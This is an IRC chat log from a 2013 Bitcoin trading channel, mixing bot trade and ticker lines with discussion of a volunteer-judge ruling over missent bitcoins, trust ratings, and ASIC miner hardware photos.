09:49:17 [MPEX] [S.MPOE] 8355 @ 0.00059541 = 4.9747 BTC [-] Jan 22 09:54:18 mircea_popescu: Awww.. :-( So what makes you think there was collaboration going on? Jan 22 09:54:36 im pretty sure there wasn't, in this case. Jan 22 09:54:53 that doesn't change the fact that if i let things stand i can wake up tomorrow to 5000 fresh cases. Jan 22 09:55:00 with perfectly nothing i can do about it. Jan 22 09:56:03 Then why did you rate pigeons -1? Jan 22 09:56:16 explain again how they get more than they put in? Jan 22 09:56:23 dub: Judges fees. Jan 22 09:56:34 [MPEX] [S.DICE] 1000 @ 0.00517521 = 5.1752 BTC [-] Jan 22 09:56:36 [MPEX] [S.DICE] 1389 @ 0.0051752 = 7.1884 BTC [-] Jan 22 09:56:37 [MPEX] [S.DICE] 2500 @ 0.0051751 = 12.9378 BTC [-] Jan 22 09:56:38 [MPEX] [S.DICE] 1882 @ 0.00516178 = 9.7145 BTC [-] Jan 22 09:56:38 dub passive party pays more than it receives. Jan 22 09:56:39 [MPEX] [S.DICE] 3000 @ 0.00514265 = 15.428 BTC [-] Jan 22 09:56:40 [MPEX] [S.DICE] 2981 @ 0.00512168 = 15.2677 BTC [-] Jan 22 09:56:41 [MPEX] [S.DICE] 1400 @ 0.00511613 = 7.1626 BTC [-] Jan 22 09:56:45 well yeah teh judges can game it Jan 22 09:57:02 dub: That's pretty much it. Jan 22 09:57:04 mircea_popescu: s/passive/losing Jan 22 09:57:05 passive party can never be held to pay more than it received. Jan 22 09:57:23 well if passive = losing then you have an extraction engine going Jan 22 09:57:33 welcome to justice Jan 22 09:57:49 its not very just Jan 22 09:58:00 mircea_popescu: Why was there even a "suit"? Why couldn't you just settle prior to the case and give him back his money? Jan 22 09:58:01 anyway, i'm off to bed. laters all. Jan 22 09:58:19 midnightmagic because i'm the sort of idiot who tries to build people and institutions. Jan 22 09:58:20 Okay, g'night! Jan 22 09:58:21 bed? Jan 22 09:58:23 it's morning Jan 22 09:58:28 but i shall focus on making btc instead, no problems. Jan 22 09:58:29 night **** BEGIN LOGGING AT Tue Jan 22 16:58:43 2013 Jan 22 17:00:39 [MPEX] [S.MPOE] 9050 @ 0.00061514 = 5.567 BTC [-] Jan 22 17:00:41 [MPEX] [S.MPOE] 12950 @ 0.00060874 = 7.8832 BTC [-] Jan 22 17:01:30 ;;ticker Jan 22 17:01:31 BTCUSD ticker | Best bid: 17.20002, Best ask: 17.22569, Bid-ask spread: 0.02567, Last trade: 17.22570, 24 hour volume: 60692.49067912, 24 hour low: 16.49111, 24 hour high: 17.59000, 24 hour vwap: 16.93719 Jan 22 17:01:38 well holy shit Jan 22 17:10:16 indeed Jan 22 17:10:19 !ticker h sdice Jan 22 17:10:22 [HAVELOCK:SDICE] 1D: 0.51000000 / 0.52959158 / 0.56000000 (95 shares, 50.31120000 BTC), 7D: 0.48000000 / 0.52212476 / 0.62000000 (719 shares, 375.40769990 BTC), 30D: 0.37000000 / 0.46375606 / 0.62000000 (3994 shares, 1852.24169988 BTC) Jan 22 17:10:49 !ticker mpex sdice Jan 22 17:10:50 The vision of Christ that thou dost see ... is my vision's greatest enemy. Jan 22 17:10:53 !ticker mpex s.dice Jan 22 17:10:55 [MPEX:S.DICE] 1D: 0.00507549 / 0.0052209 / 0.0053558 (49853 shares, 260.28 BTC), 7D: 0.00454703 / 0.00485844 / 0.00598999 (1457136 shares, 7,079.42 BTC), 30D: 0.00325183 / 0.00415694 / 0.00598999 (9482976 shares, 39,420.23 BTC) Jan 22 17:18:51 seems to be pretty on par so far Jan 22 17:20:08 [BTCTC] [COGNITIVE] 2 @ 0.3799 = 0.7598 BTC [-] Jan 22 17:29:38 [MPEX] [S.MPOE] 9424 @ 0.00061464 = 5.7924 BTC [+] Jan 22 17:33:45 hi there. Is there a RSS feed for bbet? Jan 22 17:34:07 hey Jan 22 17:34:32 no rss feed at the moment Jan 22 17:34:59 im looking into which media ill choose for propagating bets Jan 22 17:35:18 kakobrekla, you are from bbet? Jan 22 17:35:23 yes Jan 22 17:35:55 kakobrekla, owner? programmer? Jan 22 17:36:26 anyway I really like bbet. and more so than betsofbitco.in ;) Jan 22 17:37:40 turbo_ac100, me and mircea_popescu are the owners, in case you missed you can buy shares of it and stuff http://mpex.co/?mpsic=S.BBET Jan 22 17:37:51 im the developer of it yeah also Jan 22 17:37:59 right now I use page2rss for the feed. Jan 22 17:38:01 and thanks Jan 22 17:38:34 hmm Jan 22 17:38:47 Yeah I'm buying shares passthrough on litecoinglobal right now Jan 22 17:39:00 how about irc stream? Jan 22 17:39:16 would you use that? Jan 22 17:39:54 [MPEX] [S.MPOE] 11500 @ 0.00061938 = 7.1229 BTC [+] Jan 22 17:39:56 [MPEX] [S.MPOE] 6477 @ 0.00062613 = 4.0554 BTC [+] Jan 22 17:39:57 [MPEX] [S.MPOE] 15073 @ 0.00062676 = 9.4472 BTC [+] Jan 22 17:39:59 [MPEX] [S.MPOE] 13564 @ 0.00062739 = 8.5099 BTC [+] Jan 22 17:40:11 Well, where I normally read news is RSS and to a lesser degree twitter. So for me it would add one extra source of news inlet. Jan 22 17:40:20 So I probably wouldn't use it Jan 22 17:40:44 mmmmhmmmm Jan 22 17:41:36 if anyone killed your baby mircea_popescu i did Jan 22 17:41:47 ill add it to to-do then turbo_ac100 Jan 22 17:42:03 kakobrekla, thanks a lot! Jan 22 17:42:10 sure Jan 22 17:42:15 [MPEX] [S.DICE] 190 @ 0.00521999 = 0.9918 BTC [+] Jan 22 17:43:04 [BTCTC] [BTC-TRADING-PT] 1 @ 0.13 BTC [-] Jan 22 17:48:12 lol, irl ponzi schemes: http://translate.google.com/translate?sl=sk&tl=en&js=n&prev=_t&hl=sk&ie=UTF-8&eotf=1&u=http%3A%2F%2Fkosice.korzar.sme.sk%2Fc%2F6671995%2Fhorizont-vyplaca-z-kazdych-sto-eur-vrati-styri.html Jan 22 17:50:44 [BTCTC] [GSDPT] 3 @ 0.0055 = 0.0165 BTC [-] Jan 22 17:50:52 wonders any bitcoin ponzi will return 4.5% Jan 22 17:54:33 ;;ticker Jan 22 17:54:34 BTCUSD ticker | Best bid: 17.33000, Best ask: 17.33997, Bid-ask spread: 0.00997, Last trade: 17.33997, 24 hour volume: 56259.11066762, 24 hour low: 16.51001, 24 hour high: 17.59000, 24 hour vwap: 16.96477 Jan 22 17:54:46 jeez criminey Jan 22 17:57:50 24 hour gox volume seems to hold from day to day too Jan 22 17:58:59 you all killed mah babe! Jan 22 17:59:24 the last time this happened, there was some horrible news brewing that crashed the rally Jan 22 17:59:42 smickles what was that ? Jan 22 17:59:50 pirate Jan 22 18:00:17 o o Jan 22 18:00:24 it's close to an identical rise on the chart too Jan 22 18:00:27 was that mid rally ? Jan 22 18:00:44 well i guess we have bfl as a potential... tho i doubt they'll announce anything. Jan 22 18:01:23 a bunch of the 'technicals' are different tho Jan 22 18:02:05 but i bring it up because that was a bad news event on a significant (relatively) quick rise Jan 22 18:03:04 what was the final precursor last time? a bunch of puts bought, calls sold? Jan 22 18:03:20 i don't even remember ;/ Jan 22 18:03:27 o yeah, yeah i do Jan 22 18:03:36 there was large open call interest since early days of month Jan 22 18:03:48 then puts sold short Jan 22 18:03:55 days/week before the drop Jan 22 18:04:09 then calls sold as the drop happened and puts covered/going long Jan 22 18:11:55 [MPEX] [S.MPOE] 10900 @ 0.00062885 = 6.8545 BTC [+] Jan 22 18:12:53 smickles https://bitcointalk.org/index.php?topic=137923.0 there, that may be it. Jan 22 18:15:59 [MPEX] [S.MPOE] 14400 @ 0.00062885 = 9.0554 BTC [+] Jan 22 18:19:49 [MPEX] [S.MPOE] 9000 @ 0.00062885 = 5.6597 BTC [+] Jan 22 18:20:03 ;;ticker Jan 22 18:20:04 BTCUSD ticker | Best bid: 17.39501, Best ask: 17.39900, Bid-ask spread: 0.00399, Last trade: 17.39900, 24 hour volume: 56302.89909831, 24 hour low: 16.51001, 24 hour high: 17.59000, 24 hour vwap: 16.97526 Jan 22 18:20:13 whoa nelly. Jan 22 18:21:01 another day, another dolla. Jan 22 18:22:12 Now I withdrew from mtgox a long time ago \ Don't you see how late they're reactin' \ They only come and they come when they wanna Jan 22 18:29:24 [MPEX] [S.MPOE] 22683 @ 0.00062875 = 14.2619 BTC [-] Jan 22 18:29:25 [MPEX] [S.MPOE] 8517 @ 0.00062066 = 5.2862 BTC [-] Jan 22 18:32:14 [MPEX] [S.MPOE] 3867 @ 0.00062885 = 2.4318 BTC [+] Jan 22 18:32:16 [MPEX] [S.MPOE] 16883 @ 0.00062913 = 10.6216 BTC [+] Jan 22 18:32:40 so did avalons arrive yet ? Jan 22 18:35:01 [MPEX] [S.MPOE] 5450 @ 0.00062913 = 3.4288 BTC [+] Jan 22 18:35:27 Not yet...I figured people would start getting them next week, though it depends on how they shipped Jan 22 18:36:21 o, wait, avalon ships from china ? Jan 22 18:38:51 not even tracking numbers available Jan 22 18:40:54 yeah Jan 22 18:43:28 this is a deliberate attempt to drive people nuts. Jan 22 18:44:58 also, one would say for 1.5k they'll find a better case than this: http://launch.avalon-asics.com/wp-content/uploads/2013/01/DSC00517-1024x680.jpg Jan 22 18:45:27 lol, DIY kit would be better Jan 22 18:45:32 haha Jan 22 18:46:00 I've got mixed feeling about a giant 400w steel box running only 66GH/s.. Jan 22 18:46:30 I suppose that's the result of 110nm processes Jan 22 18:46:35 Korbman you'd prefer a fan box running inaba's hot air ? Jan 22 18:47:10 Ha, for the sake of argument let's pretend everyone ships Jan 22 18:47:35 that box actually looks like the custom power unit i had for my old z80 Jan 22 18:47:40 back in the late 80s Jan 22 18:47:55 iirc z80s are 110nm ? Jan 22 18:48:57 z80s are many nm Jan 22 18:49:06 110nm is too low for original ones though Jan 22 18:49:29 probably 200-300m, Jan 22 18:49:31 nm Jan 22 18:50:05 a was it ? Jan 22 18:50:26 they still make z80s, btw Jan 22 18:50:31 im sure. Jan 22 18:50:33 they're very popular for 8 bit microcontrollers Jan 22 18:50:41 4000nm I think Jan 22 18:50:43 yeah ui was gonna say, it was a good 8 bit design Jan 22 18:50:48 Korbman: 4000nm? wtf dude Jan 22 18:50:53 http://en.wikipedia.org/wiki/Transistor_count Jan 22 18:50:54 he means 400 lol Jan 22 18:51:04 400nm seems too high Jan 22 18:51:06 not for late 80s Jan 22 18:51:18 early Z80 was 4 micrometers Jan 22 18:51:20 lemme go look it up myself Jan 22 18:51:21 z80 was > 8080 iirc Jan 22 18:51:31 mircea_popescu: ~= really Jan 22 18:51:38 its a 8080 clone with 8086ish features tacked on Jan 22 18:51:40 well at least that's what thye claimed Jan 22 18:51:42 and i believed it! Jan 22 18:52:27 anyway, this was like 1988 and shit, not the early zilogs Jan 22 18:52:30 mircea_popescu: btw, I think they still make 6502s too Jan 22 18:52:32 So yes...4000nm Jan 22 18:53:03 i wonder if bfl next step, after tackling the android miner market, is to make z80 miner software. Jan 22 18:53:22 bwhaha Jan 22 18:56:27 so, asics scams may burst the upcoming bubble Jan 22 18:56:31 [MPEX] [S.MPOE] 37833 @ 0.00062066 = 23.4814 BTC [-] Jan 22 18:56:57 okay I was wrong Jan 22 18:57:11 if it was late 80s, it could have been 1000nm Jan 22 18:57:25 350 didnt become into existence until 1995 Jan 22 18:57:45 1500 came into existence in 1982, 1000 in 1985, 800 in 1989 Jan 22 18:57:53 3000 in 1975 Jan 22 18:58:16 which means orginal z80s and 6502s and whatnot would have been that size Jan 22 18:58:37 a hey. hattip to Korbman Jan 22 18:58:47 he said 4, not 3. Jan 22 18:58:54 there seems to be no size of 4. Jan 22 18:59:09 went from 10 in 71 to 3 in 75 Jan 22 18:59:09 ya well he had something of a right idea. Jan 22 18:59:23 mircea_popescu: he only gets it right for original gen ones Jan 22 18:59:27 you didnt have an original gen one Jan 22 18:59:32 probably one of a thousand clones Jan 22 19:00:19 lol, when looking closely on the rightmost fan on http://launch.avalon-asics.com/wp-content/uploads/2013/01/DSC00517.jpg Jan 22 19:00:26 seems nothign is inside Jan 22 19:00:37 right most? Jan 22 19:00:46 calibrate your screen Jan 22 19:00:50 I can see all three fans clearly Jan 22 19:01:09 okay, now calibrate youe eyes and try to look between its blades Jan 22 19:01:18 well yes, its an empty case Jan 22 19:01:22 oh, is that what you ment? Jan 22 19:01:25 yes Jan 22 19:01:28 hah. Jan 22 19:01:40 I thought you meant an empty fan slot Jan 22 19:02:05 don't thank me, thank google haha Jan 22 19:02:57 oh wow Jan 22 19:02:59 I didnt know this Jan 22 19:03:13 wikipedia has an entire article on the fab process Jan 22 19:03:19 https://en.wikipedia.org/wiki/Semiconductor_fabrication Jan 22 19:04:33 if micon is in the wiki, fab process will be too. Jan 22 19:04:43 well Ive never came across it before Jan 22 19:06:01 omg moar fan cases ?! Jan 22 19:06:29 well, it depends how well packed they make that Jan 22 19:06:45 jurov: btw, that might not be empty Jan 22 19:07:05 the whole case I mean Jan 22 19:07:24 that could be the spot for a psu Jan 22 19:07:51 at least why there is so much light? looks like whole rear side isn't there Jan 22 19:08:09 well, if its an empty psu slot, you know how big atx slots are Jan 22 19:12:08 [MPEX] [S.MPOE] 11550 @ 0.00061521 = 7.1057 BTC [-] Jan 22 19:12:10 [MPEX] [S.MPOE] 19050 @ 0.00061505 = 11.7167 BTC [-] Jan 22 19:22:05 i bet a pre-order one in the next round Jan 22 19:26:09 but look at how the light reflects in on the furthest fan as well Jan 22 19:27:01 the case doesn't seem to have a backing Jan 22 19:28:07 maybe it's just the cover Jan 22 19:31:03 [HAVELOCK] [SDICE] 1 @ 0.5499998 BTC [-] Jan 22 19:32:25 meh probably Jan 22 19:33:00 BFL pulled the same empty case stunt, and I don't really care that it's empty to begin with. It's just there to try and appease some of the people looking for pics Jan 22 19:33:46 im not entirely sure what'd appease them. maybe one of those go-pro cams attached to an employee's head Jan 22 19:33:52 with direct feed Jan 22 19:40:06 [MPEX] [S.MPOE] 6819 @ 0.00061592 = 4.2 BTC [+] Jan 22 19:40:35 ha, probably not even that Jan 22 19:43:33 cause it wouldn't work in the toilet, right ? so it'd be clearly shenanigans there. Jan 22 19:44:58 ;;ticker Jan 22 19:44:58 BTCUSD ticker | Best bid: 17.37001, Best ask: 17.44300, Bid-ask spread: 0.07299, Last trade: 17.37001, 24 hour volume: 56123.22404659, 24 hour low: 16.51001, 24 hour high: 17.59000, 24 hour vwap: 17.01255 Jan 22 19:46:44 [MPEX] [S.DICE] 2621 @ 0.00521998 = 13.6816 BTC [-] Jan 22 19:51:07 [BTCTC] [GSDPT] 4 @ 0.0052 = 0.0208 BTC [-] Jan 22 19:51:09 [BTCTC] [GSDPT] 5 @ 0.0051 = 0.0255 BTC [-] Jan 22 19:51:11 [BTCTC] [GSDPT] 10 @ 0.005 = 0.05 BTC [-] Jan 22 19:51:13 [BTCTC] [GSDPT] 1 @ 0.0049 BTC [-] Jan 22 19:51:13 [BTCTC] [GSDPT] 9 @ 0.0049 = 0.0441 BTC [-] Jan 22 19:51:15 [BTCTC] [GSDPT] 10 @ 0.0049 = 0.049 BTC [-] Jan 22 19:51:16 [BTCTC] [GSDPT] 10 @ 0.0048 = 0.048 BTC [-] Jan 22 19:51:17 [BTCTC] [GSDPT] 451 @ 0.0046 = 2.0746 BTC [-] Jan 22 19:51:49 [MPEX] [S.MPOE] 28781 @ 0.00061592 = 17.7268 BTC [+] Jan 22 19:51:51 [MPEX] [S.MPOE] 8100 @ 0.00061505 = 4.9819 BTC [-] Jan 22 19:51:52 [MPEX] [S.MPOE] 376 @ 0.00061464 = 0.2311 BTC [-] Jan 22 19:51:54 [MPEX] [S.MPOE] 22599 @ 0.0006141 = 13.878 BTC [-] Jan 22 19:51:55 [MPEX] [S.MPOE] 11900 @ 0.00060874 = 7.244 BTC [-] Jan 22 19:51:57 [MPEX] [S.MPOE] 3652 @ 0.00060809 = 2.2207 BTC [-] Jan 22 19:56:48 [MPEX] [S.MPOE] 2748 @ 0.00060809 = 1.671 BTC [-] Jan 22 19:56:49 [MPEX] [S.MPOE] 12300 @ 0.00060807 = 7.4793 BTC [-] Jan 22 19:56:51 [MPEX] [S.MPOE] 14212 @ 0.00060796 = 8.6403 BTC [-] Jan 22 19:56:52 [MPEX] [S.MPOE] 8590 @ 0.00060483 = 5.1955 BTC [-] Jan 22 20:00:17 http://www.forbes.com/sites/jonmatonis/2013/01/22/bitcoin-casinos-release-2012-earnings/ Jan 22 20:02:43 Operating expenses were minimal in 2012 and the company also paid monthly bitcoin dividends to ‘public’ shareholders which represent 10% of the total 100,000,000 outstanding shares. To invest in the operator and bet on the house, SatoshiDice shares are traded on the MPEx bitcoin stock exchange under ticker symbol S.DICE (see August 19th, 2012 Prospectus). At the current exchange rate of $17.00 per BTC, SatoshiDice Jan 22 20:02:43 is a company valued at $8.9 million. Jan 22 20:02:46 teh wow. Jan 22 20:03:03 [MPEX] [S.MPOE] 9450 @ 0.00061878 = 5.8475 BTC [+] Jan 22 20:03:05 [MPEX] [S.MPOE] 34100 @ 0.00061925 = 21.1164 BTC [+] Jan 22 20:08:43 [MPEX] [S.DICE] 2200 @ 0.00521998 = 11.484 BTC [-] Jan 22 20:14:43 kakobrekla http://trilema.com/2013/the-title-is-in-the-pudding/ you in the race too ? Jan 22 20:17:35 hehe Jan 22 20:17:42 [MPEX] [S.MPOE] 8565 @ 0.00060483 = 5.1804 BTC [-] Jan 22 20:17:44 [MPEX] [S.MPOE] 13235 @ 0.00060413 = 7.9957 BTC [-] Jan 22 20:18:29 :D Jan 22 20:18:43 first at #1 wins! Jan 22 20:30:40 [MPEX] [S.MPOE] 23050 @ 0.00060702 = 13.9918 BTC [+] Jan 22 20:33:33 [MPEX] [S.DICE] 2341 @ 0.00521997 = 12.2199 BTC [-] Jan 22 20:35:48 [MPEX] [S.MPOE] 28736 @ 0.00060702 = 17.4433 BTC [+] Jan 22 20:40:27 [MPEX] [S.MPOE] 11550 @ 0.00060783 = 7.0204 BTC [+] Jan 22 20:48:31 [MPEX] [S.MPOE] 40670 @ 0.00060702 = 24.6875 BTC [-] Jan 22 20:48:33 [MPEX] [S.MPOE] 3881 @ 0.00060413 = 2.3446 BTC [-] Jan 22 20:48:34 [MPEX] [S.MPOE] 3652 @ 0.00060354 = 2.2041 BTC [-] Jan 22 20:52:04 ;;ticker Jan 22 20:52:04 BTCUSD ticker | Best bid: 17.50000, Best ask: 17.50001, Bid-ask spread: 0.00001, Last trade: 17.56066, 24 hour volume: 57362.31021214, 24 hour low: 16.51001, 24 hour high: 17.59000, 24 hour vwap: 17.04055 Jan 22 20:55:59 [MPEX] [S.MPOE] 22250 @ 0.00060354 = 13.4288 BTC [-] Jan 22 20:59:49 [BTCTC] [RSM] 84 @ 0.009 = 0.756 BTC [+] Jan 22 21:00:15 [BTCTC] [RSM] 100 @ 0.0091 = 0.91 BTC [+] Jan 22 21:01:32 [BTCTC] [RSM] 100 @ 0.0092 = 0.92 BTC [+] Jan 22 21:02:36 [BTCTC] [RSM] 22 @ 0.0092 = 0.2024 BTC [+] Jan 22 21:35:21 [MPEX] [S.MPOE] 6343 @ 0.00060658 = 3.8475 BTC [+] Jan 22 21:35:23 [MPEX] [S.MPOE] 4650 @ 0.00060783 = 2.8264 BTC [+] Jan 22 21:42:52 mircea_popescu: You should file for a change of venue next time. #bitcoin-court! :-) Jan 22 21:43:15 i think i'm done with experiments in the people range. Jan 22 21:43:22 volunteer judges, fire and brimstone, damnation! Jan 22 21:43:30 i think the best way forward is if one of the lawschools does a summer project for this Jan 22 21:43:59 it's just not practical to conscript people off the street for playing the legal scholar. Jan 22 21:45:10 Actually, that's exactly what happens with justices of the peace. Jan 22 21:45:20 6 month course, if that, and voila. Jan 22 21:45:23 You're a JP. Jan 22 21:45:55 Arbitration and Mediation, conflict resolution, are all handled by people who two warring parties trust. Jan 22 21:46:01 whom Jan 22 21:46:26 this wasn't supposed to be neither arbitration nor mediation tho. Jan 22 21:47:23 It is less.. what legal authority could it have possibly exerted? Jan 22 21:47:52 blah blah blah Jan 22 21:48:25 [MPEX] [S.MPOE] 3357 @ 0.00060886 = 2.0439 BTC [+] Jan 22 21:48:27 [MPEX] [S.MPOE] 5000 @ 0.00060355 = 3.0178 BTC [-] Jan 22 21:48:27 midnightmagic http://trilema.com/2012/gpg-contracts/ Jan 22 21:48:28 [MPEX] [S.MPOE] 3198 @ 0.00060354 = 1.9301 BTC [-] Jan 22 21:49:51 No, some of the assertions in there are wrong. Jan 22 21:49:57 ya well. Jan 22 21:50:20 Aaaanyway, it's too bad you view it as a failure. Jan 22 21:50:32 [MPEX] [S.MPOE] 6345 @ 0.00060335 = 3.8283 BTC [-] Jan 22 21:50:33 [MPEX] [S.MPOE] 8655 @ 0.00061156 = 5.2931 BTC [+] Jan 22 21:50:40 But I'm curious to know why you negrated pigeons? Jan 22 21:51:04 cuz i dun trust him. Jan 22 21:51:20 Why though? Jan 22 21:51:57 well, to trust someone means to believe they act in a certain way. Jan 22 21:52:23 i can currently make no prediction whatever. that means no trust. Jan 22 21:52:59 ;;rated mircea_popescu Jan 22 21:52:59 You rated user mircea_popescu on Thu Mar 29 06:56:09 2012, giving him a rating of 1, and supplied these additional notes: His beard is sexy.. Jan 22 21:53:09 Did you go into the "suit" believing people would decide to let you keep the overage? Jan 22 21:53:11 ;;rate pigeons Jan 22 21:53:11 (rate []) -- Enters a rating for in the amount of . Use optional field to enter any notes you have about this user. must be the user's GPG-registered username, Your previously existing rating, if any, will be overwritten. Jan 22 21:53:14 ;;rated pigeons Jan 22 21:53:15 You rated user pigeons on Wed Nov 16 14:06:33 2011, giving him a rating of 3, and supplied these additional notes: super cards. rock & roll. Jan 22 21:53:23 midnightmagic what's the overage ? Jan 22 21:53:29 ;;rated midnightmagic Jan 22 21:53:31 You have not yet rated user midnightmagic Jan 22 21:53:42 mircea_popescu: Perhaps I am misunderstanding. Someone accidentally sent you too much bitcoin, right? Jan 22 21:53:51 mircea_popescu: You told them to sue you for it in court? Jan 22 21:53:53 and then sent 10 more btc Jan 22 21:53:59 and then sent he correct amount Jan 22 21:54:15 a. no. i specifically went into the suit as an alternative to the "i simply keep it" rule in force. Jan 22 21:54:25 so no. if anything, i went into the suit so as NOT to have to keep it. Jan 22 21:54:38 Isn't that how the judges ruled? Jan 22 21:54:41 nope. Jan 22 21:54:47 They ruled you keep it? Jan 22 21:54:57 the judges ruled that anyone can take any ammount of money from mpex at any time at their option. Jan 22 21:55:05 we ruled he pay the fee Jan 22 21:55:19 if a rota member tries it and i'm nominated i'm going to take their funds Jan 22 21:55:30 and suggest they be replaced Jan 22 21:55:42 jcpham how would you know ? Jan 22 21:55:44 bitcoin is anon. Jan 22 21:55:58 Here's how I understand it. The judges get paid a fee. 3 x 3 BTC (for three judges.) Everything else ended up with its rightful owner, correct? Jan 22 21:56:00 maybe in this future case that doesn't exist Jan 22 21:56:07 but not in the case that just transpired Jan 22 21:56:33 also fuck you for still talking about this Jan 22 21:56:38 :) Jan 22 21:56:45 im not even, midnightmagic is as usual late to the parties lol Jan 22 21:57:07 midnightmagic there's 130 btc that was missent. this was returned. Jan 22 21:57:10 haha Jan 22 21:57:17 there's 10 btc paid by the op and 10 btc paid by mpex. out of these 20, judges get 9, prevailing party gets 10. Jan 22 21:57:29 thats the way you designed it Jan 22 21:57:33 Nobody's really giving me a straight answer. Perhaps it only seems like I'm late because I have to wring the truth out of people. Jan 22 21:57:52 midnightmagic what srsly ? what straight answer is missing ? Jan 22 21:58:14 midnightmagic: sounds like you had it right Jan 22 21:58:24 i provided good suggestion to avoid this edge-case Jan 22 21:58:27 "the judges ruled that anyone can take any ammount of money from mpex at any time at their option." <-- this is the same, logically, as A-> ? ->C. I'm just trying to find the progression. Jan 22 21:58:29 an edgecase of honest people Jan 22 21:58:42 midnightmagic but have you read the description of the problem ? Jan 22 21:58:52 specifically http://trilema.com/2013/rota-post-mortem/ ? Jan 22 21:59:18 mircea_popescu: I thought I had. And then to get confirmation I've been asking people, and nobody, yourself included, can tell me why you're so upset. Jan 22 21:59:28 im not upset in the slightest. Jan 22 21:59:30 mircea_popescu: if you had stuck to your rule I'd side with you, but you changed your mind after making him use the rota Jan 22 21:59:40 dub which rule ? Jan 22 21:59:41 or at least thats what it looks like Jan 22 21:59:50 the "I keep it" rule Jan 22 21:59:54 mircea_popescu: The pigeons negrating wasn't the actions of a man who's upset? Jan 22 22:00:02 midnightmagic nope. Jan 22 22:00:20 "pigeons killed my baby"? That isn't retaliatory? Jan 22 22:00:41 well i guess it depends. dead babies are supposed to be funny. Jan 22 22:00:54 Usually funny dead babies are accompanied by a punchline. Jan 22 22:01:02 myeah. Jan 22 22:01:03 or a blog post. Jan 22 22:01:10 Actually finding dead babies in a trash can? Not so much.. Jan 22 22:01:17 hey, what can i tell you. Jan 22 22:01:30 i bet eskimobob is orgasming Jan 22 22:01:31 people humor and universe humor don't always mesh Jan 22 22:01:54 It *sounds* as though you discovered a hole in the logic of the case, in that there's no real way to determine judge and party collusion. Jan 22 22:02:05 jcpham: without doubt he's been slojacking fro the last 24 hours Jan 22 22:02:14 herr Jan 22 22:02:25 the problem is the judges (unwittingly, i am sure) indemnified the active party Jan 22 22:02:34 this can never work, in practice. Jan 22 22:02:40 that's ridiculous, there is no whole, if mircea_popescu is afraid of losing court fees he can just credit the original deposit Jan 22 22:02:45 *hole Jan 22 22:02:49 mircea_popescu: Okay, okay. So what were you *hoping* for out of the case? That the judges wouldn't take their fees and all the money gets split evenly so nobody's out? Jan 22 22:02:58 more generally, the rota can never work, in practice, because normal, honest, well meaning people have no way to reliably avoid falling in such tarpits. Jan 22 22:03:17 midnightmagic: I get that he was hoping to win and then benevolently refund the other guy Jan 22 22:03:22 im not hoping for anything. teh case is resolved, it has shown the system to not be workable, that's what it is. Jan 22 22:03:35 dub nah. Jan 22 22:03:50 mircea_popescu: why did you enter into arbitration during the case then? Jan 22 22:03:51 mircea_popescu: What result *would* have made you say, "the system works" Jan 22 22:03:58 dub i did no such thing ? Jan 22 22:04:21 midnightmagic the thing suggested in my argument, ie, 92.x% award. person gets his 130, has to pay fee. Jan 22 22:04:25 mircea_popescu: sure you did, you asked him to prove that the txn was his by signing somethign with the key Jan 22 22:04:29 mircea_popescu: people aren't so much criticizing you as trying to understand your thinking Jan 22 22:04:37 dub that's not in any way arbitration Jan 22 22:04:45 mircea_popescu: The whole fee? Like the judges fee? Jan 22 22:04:46 pigeons i don't feel particularly criticised. Jan 22 22:04:49 midnightmagic yes. Jan 22 22:04:52 the whole fee. Jan 22 22:04:54 mircea_popescu: well to onlookers such as myself thats exactly what it is Jan 22 22:04:56 Ohhhh... I see. Jan 22 22:05:11 dub i do not know why. i was being stewardly, i guess. trying to help the person along, because otherwise Jan 22 22:05:21 i provided excellent suggestions on how to avoid this and i think mircea_popescu has sufficiently CYA'd for the next case of mistaken funds Jan 22 22:05:25 if i just said "fiogure it out" i doubt he;d have ever found his way rthrough in time Jan 22 22:05:28 no there is just drama Jan 22 22:05:38 That's it?! Jan 22 22:05:41 midnightmagic yes. Jan 22 22:06:04 ... Jan 22 22:06:07 ikr. Jan 22 22:06:14 i'm going to go kill myself now Jan 22 22:06:15 dead fuckin babies everywhere. Jan 22 22:06:20 mircea_popescu: one of the key aspects of legality is intent, you actions inferred the intent to refund him Jan 22 22:06:38 I just assumed this was all an MP scheme to get the Rota off the ground and produce credibility that MP was not pulling the strings. Jan 22 22:06:40 Okay, then let me answer your earlier criticism: I am not late to the party after all. :-) Thank you. I'm just trying to understand. Jan 22 22:06:42 dub there's no discussion of intent of deeds and acts made during trial. Jan 22 22:06:44 mircea_popescu: if you actually re-read teh comments with a neutral eye, it actually looks like the rota worked perfectly Jan 22 22:06:47 him spelling all that out made me feel why didn't he just go ahead and refund in the first place Jan 22 22:07:34 Bugpowder not exactly a scheme, and not to that, no. it was more of a, let them drive see what they do. Jan 22 22:07:37 yeah i htink mircea_popescu is pretending to be upset to make people more likely to see oh the rota isnt biased to mpex, let's use it Jan 22 22:07:50 heh Jan 22 22:07:57 The rota still exists? Jan 22 22:07:58 i will be extremely surprised if anyone actually uses it. Jan 22 22:08:00 but who knows. Jan 22 22:08:06 midnightmagic as much as it ever did. Jan 22 22:08:09 no one would ever have used it had you won Jan 22 22:08:18 i can only imagine how bad it'll be when an actual mistake is made Jan 22 22:08:18 ^ Jan 22 22:08:31 jcpham no, you can't. Jan 22 22:08:49 i wish your glass were half full on this Jan 22 22:08:50 alright, my curiosity is satisfied. Thanks mircea_popescu. I'm sorry I keep persisting beyond the point normal people would. Jan 22 22:08:57 midnightmagic not really a crime. Jan 22 22:09:22 Well, it tends to cause problems.. Jan 22 22:09:37 you're not the only one confused midnightmagic Jan 22 22:09:48 i'm terribly confused Jan 22 22:10:06 but in a decisive way. Jan 22 22:10:12 yeah me too Jan 22 22:10:34 i rarely second guess myself Jan 22 22:10:59 It's too bad you're deciding to simply keep misspent bitcoins now, though. Jan 22 22:11:04 you second guess having the prevailing plantiff's fees returned? Jan 22 22:11:16 midnightmagic cleanner. Jan 22 22:11:25 i second guess a normal decison that makes sense Jan 22 22:11:32 we should came up with some crazy ruling Jan 22 22:11:36 and kept all the coins Jan 22 22:11:37 yeah i agree Jan 22 22:11:45 and made it cost MP more Jan 22 22:11:51 i'd feel a lot better about that today Jan 22 22:11:52 Okay, lunchtime. :) brb soon as the sante fe rice my wife made is nuked! Jan 22 22:12:21 I too am excited about lunch Jan 22 22:12:26 the old "is it better to have tried and failed or to not have tried at all" discussion huh. Jan 22 22:12:32 raw fish slain by my own hand Jan 22 22:12:46 im excited about watching a film, so we reconvene once everyone's deexcited lol Jan 22 22:21:05 [BTCTC] [RSM] 100 @ 0.0088 = 0.88 BTC [-] Jan 22 22:21:46 ping pe41 Jan 22 22:21:55 cockhat Jan 22 22:22:15 [BTCTC] [RSM] 